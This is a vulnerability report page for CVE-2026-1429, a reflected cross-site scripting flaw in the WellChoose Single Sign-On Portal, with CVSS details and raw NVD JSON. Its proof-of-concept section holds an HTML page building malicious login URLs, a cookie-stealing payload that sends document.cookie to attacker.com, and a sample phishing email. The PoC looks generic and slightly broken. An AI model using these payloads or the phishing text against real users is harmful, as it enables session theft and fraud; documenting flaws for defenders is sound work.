Security Vulnerability Report
中文
CVE-2026-1429 CVSS 5.4 MEDIUM

CVE-2026-1429

Published: 2026-01-26 09:15:48
Last Modified: 2026-03-11 22:44:49

Description

Single Sign-On Portal System developed by WellChoose has a Reflected Cross-site Scripting vulnerability, allowing authenticated remote attackers to execute arbitrary JavaScript codes in user's browser through phishing attacks.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:wellchoose:single_sign-on_portal_system:*:*:*:*:*:*:*:* - VULNERABLE
WellChoose Single Sign-On Portal System (所有未修复版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2026-1429 PoC - Reflected XSS in WellChoose SSO Portal --> <!-- Target: WellChoose Single Sign-On Portal System --> <!-- Attack Type: Reflected Cross-Site Scripting --> <!-- Step 1: Construct malicious URL --> <!-- Replace TARGET_URL with actual vulnerable endpoint --> <!-- Example: https://sso.wellchoose.com/sso/login?redirect= --> <!DOCTYPE html> <html> <head> <title>CVE-2026-1429 PoC</title> </head> <body> <h2>CVE-2026-1429 - Reflected XSS PoC</h2> <p>Target: WellChoose Single Sign-On Portal System</p> <script> // Malicious URL with XSS payload const baseUrl = 'https://TARGET_URL/sso/login'; // XSS payload - steals session cookies const xssPayload = '<img src=x onerror="fetch(\'https://attacker.com/steal?cookie=\'+document.cookie)\)">'; // Alternative payload - alert demonstration const altPayload = '<script>alert("XSS - CVE-2026-1429")<\/script>'; // Construct malicious URL const maliciousUrl = baseUrl + '?redirect=' + encodeURIComponent(xssPayload); const altUrl = baseUrl + '?return_url=' + encodeURIComponent(altPayload); // Display generated URLs document.write('<p>Malicious URL 1:</p>'); document.write('<a href="' + maliciousUrl + '" target="_blank">' + maliciousUrl + '</a>'); document.write('<br><br>'); document.write('<p>Malicious URL 2:</p>'); document.write('<a href="' + altUrl + '" target="_blank">' + altUrl + '</a>'); // Function to test XSS (for authorized testing only) function testXSS() { // Extract parameter from URL and display const params = new URLSearchParams(window.location.search); const testParam = params.get('test'); if (testParam) { document.getElementById('output').innerHTML = testParam; } } </script> <div id="output"></div> <!-- Simulated phishing email content --> <h3>Phishing Attack Scenario:</h3> <pre> Subject: Please verify your SSO account Dear User, Your SSO session requires verification. Please click the link below: [Malicious URL Here] Best regards, SSO Admin Team </pre> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-1429", "sourceIdentifier": "[email protected]", "published": "2026-01-26T09:15:47.603", "lastModified": "2026-03-11T22:44:48.973", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Single Sign-On Portal System developed by WellChoose has a Reflected Cross-site Scripting vulnerability, allowing authenticated remote attackers to execute arbitrary JavaScript codes in user's browser through phishing attacks."}, {"lang": "es", "value": "El Sistema de portal de inicio de sesión único desarrollado por WellChoose tiene una vulnerabilidad de cross-site scripting reflejado, permitiendo a atacantes remotos autenticados ejecutar códigos JavaScript arbitrarios en el navegador del usuario a través de ataques de phishing."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wellchoose:single_sign-on_portal_system:*:*:*:*:*:*:*:*", "versionEndExcluding": "iftop_p4_181", "matchCriteriaId": "F6466370-06D4-4AE1-9E0D-DF0BBE2690E5"}]}]}], "references": [{"url": "https://www.twcert.org.tw/en/cp-139-10655-59160-2.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.twcert.org.tw/tw/cp-132-10654-23f40-1.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}